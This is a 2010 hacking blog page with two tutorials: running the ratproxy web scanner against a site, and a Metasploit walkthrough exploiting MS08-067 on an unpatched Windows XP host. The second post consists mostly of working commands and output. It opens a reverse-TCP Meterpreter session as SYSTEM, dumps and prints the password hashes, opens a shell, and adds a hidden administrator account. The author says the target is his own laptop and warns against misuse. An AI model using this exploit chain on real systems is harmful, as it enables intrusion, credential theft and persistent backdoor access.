Wednesday, February 3, 2010

ratproxy - xss vulnerable scanner

[size=6][color=Red][b]ratproxy[/b][/color][/size]

Ratproxy is a tools use to scan the web vulnerable. The author of the ratproxy is Michal Zalewski, who is the famous greyhat in europe, the p0f also created by him as well.

The way of ratproxy works is act as proxy in between your browser and server. Then capture the all transaction from both sides. See below : -

browser --- ratproxy --- server

Requirement:
make the life easier, get a BT4. Then, boot the live CD will do

login = root password = toor


change directory to /pentest/web/ratproxy
root@bt:/#cd /pentest/web/ratproxy

make a directory for trace file create by ratproxy later root@bt:/pentest/web/ratproxy# mkdir /root/ratproxy

Then, run the ratproxy root@bt:/pentest/web/ratproxy# ./ratproxy -v /root/ratproxy/ -w e.log -d xxxxx.com.my -XCl2efxiscmg -p 8080 ratproxy version 1.58-beta by lcamtuf@google.com]lcamtuf@google.com Proxy configured successfully. Have fun, and please do not be evil. WARNING: Disruptive tests enabled. use with care. [+] Accepting connections on port 8080/tcp (local only)...

Simple explantion:
-v the directory i want to store the trace files
-w create a log file based on this project
-d xxxx.com.my is refer to my domain name
-p 8080 is the proxy port

for other parameters,please refer to http://code.google.com/p/ratproxy/wiki/RatproxyDoc
cause it is a bit longer



then, set up browser point to the proxy..Because i testing in my own box. So i use local host,port 8080 will do




go to that website,then login to that site。
after login you have to visit every single pages of this site.
for this example, i only visited for few pages


root@bt:/pentest/web/ratproxy# ./ratproxy -v /root/ratproxy/ -w e.log -d e-market.com.my -XCl2efxiscmg -p 8080
ratproxy version 1.58-beta by
lcamtuf@google.com]lcamtuf@google.com
Proxy configured successfully. Have fun, and please do not be evil.
WARNING: Disruptive tests enabled. use with care.
[+] Accepting connections on port 8080/tcp (local only)...
^C
back to this console, press CTRL+C to stop the ratproxy once you finish visit all the pages



Generate the html report
root@bt:/pentest/web/ratproxy# ./ratproxy-report.sh e.log > ratproxy_report.html
root@bt:/pentest/web/ratproxy# ls -lah ratproxy_report.html
-rw-r--r-- 1 root root 61K Jan 14 14:41 ratproxy_report.html




Then, open the browser to read the html report
see the screenshot, it can be categorized as few severity.
You can click the VIEW TRACE to see the whole process
also can click the EDIT to edit value。



look, the result of VIEW TRACE。
you can see the transaction from user browser to server


how is this tools ? coolz ??
this tool is used by Google as well.
Posted by at No comments:

Tuesday, February 2, 2010

metaspoilt [ms08_067] - conflicker

still remember the conflicker ? what is the damage to your company when this things spread out??

ms08-067 is a patches to prevent conflicker.
here im going to attack the machine which dont patches the ms08-067 by using metaspoilt.

requirement:-

system = ubuntu 9.10

apps = metaspoilt

(i dont/wont show how to install metaspoilt in ubuntu, as system admin,you guy please figure out by yourself. )


To execute msf,

#./opt/metaspoilt/msfconsole

then call the exploit module:

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.19
RHOST => 192.168.1.19
noted:RHOST is remote host,meaning your victim

msf exploit(ms08_067_netapi) > set LHOST 192.168.1.17
LHOST => 192.168.1.17
noted:LHOST is local host,the box you running msf

msf exploit(ms08_067_netapi) > set LPORT 4444
LPORT => 4444
note:LPORT is local port,the port you want to use. we use 4444 as example

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp
note:set the payload to do attack

msf exploit(ms08_067_netapi) > exploit
note: exploit the victim host


  • Started reverse handler on port 4444
  • Automatically detecting the target…
  • Fingerprint: Windows XP Service Pack 2 – lang:English
  • Selected Target: Windows XP SP2 English (NX)
  • Triggering the vulnerability…
  • Sending stage (725504 bytes)
  • Meterpreter session 1 opened (192.168.1.17:4444 -> 192.168.1.19:1442)

    • note:see the last line ??you successful created the session between your box and victim's box

    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    note:getuid to see the system

    meterpreter > run hashdump


  • Obtaining the boot key…
  • Calculating the hboot key using SYSKEY bb35d43e0a531b188967bb43ce0f4823…
  • Obtaining the user list and keys…
  • Decrypting user keys…
  • Dumping password hashes…

    Administrator:500:281b94b1e665a2b2aad3b435b51404ee:361db25d1614b529c719205dfc0d7420:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    HelpAssistant:1000:5416885c50a87bdd115df056849a0a33:62a470b79584552188d83ce96f2482b2:::
    SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:aff70073db96549d5ecceb973af24bcc:::
    chenghui:1003:08fd436b7baa45341b4d308d3f102048:f7cabbe13fd7b71848064cbb40c5c13e:::
    ASPNET:1004:7bb95a870045309f8d5f5b133fbbefd5:38982698a41a6030a410d68d50428bf3:::
    admin:1011:08fd436b7baa45341b4d308d3f102048:f7cabbe13fd7b71848064cbb40c5c13e:::
    __vmware_user__:1013:c9d38fa38122a3212d28a90ef0e5c0c5:3f06c5556c2f5aaeeb4cb499ab9681e7:::

    note:run hashdump, i had dumped all user account's hash key。
    if you do not want to add new account into this host,think how to break the hash。
    tips: cain and abel

    meterpreter > shell
    Process 4288 created.
    Channel 2 created.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    note:issue shell command. i owned the shell。 hehe

    C:\WINDOWS\system32>ipconfig
    ipconfig

    Windows IP Configuration

    Ethernet adapter VMware Network Adapter VMnet8:

    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 192.168.81.1
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . :

    Ethernet adapter VMware Network Adapter VMnet1:

    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 192.168.136.1
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . :

    Ethernet adapter Wireless Network Connection:

    Media State . . . . . . . . . . . : Media disconnected

    Ethernet adapter VirtualBox Host-Only Network:

    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 192.168.56.1
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . :

    Ethernet adapter Local Area Connection:

    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 192.168.1.19
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : 192.168.1.1
    note:ipconfig, it's works。


    C:\WINDOWS\system32>net user a13x P@ssw0rd /add
    net user a13x P@ssw0rd /add
    The command completed successfully.
    note:i try to add adduser。 ^^ please practice the windows command。

    C:\WINDOWS\system32>net localgroup Administrators a13x /add
    net localgroup Administrators a13x /add
    The command completed successfully.
    note:i add myself into administrators group。 damn eveil

    you can play with this host with windows command like net view ,net use, tasklist ,taskkill, net service and etc.
    please practice more with windows command

    the victim is my laptop , running with windows xp sp2, windows firewall on, mcafee disabled。

    • ENJOY HACKING, please do not harm other ppl because this is misuse of computer. You can be send to jail !!
    Posted by at No comments:
    Subscribe to: Posts (Atom)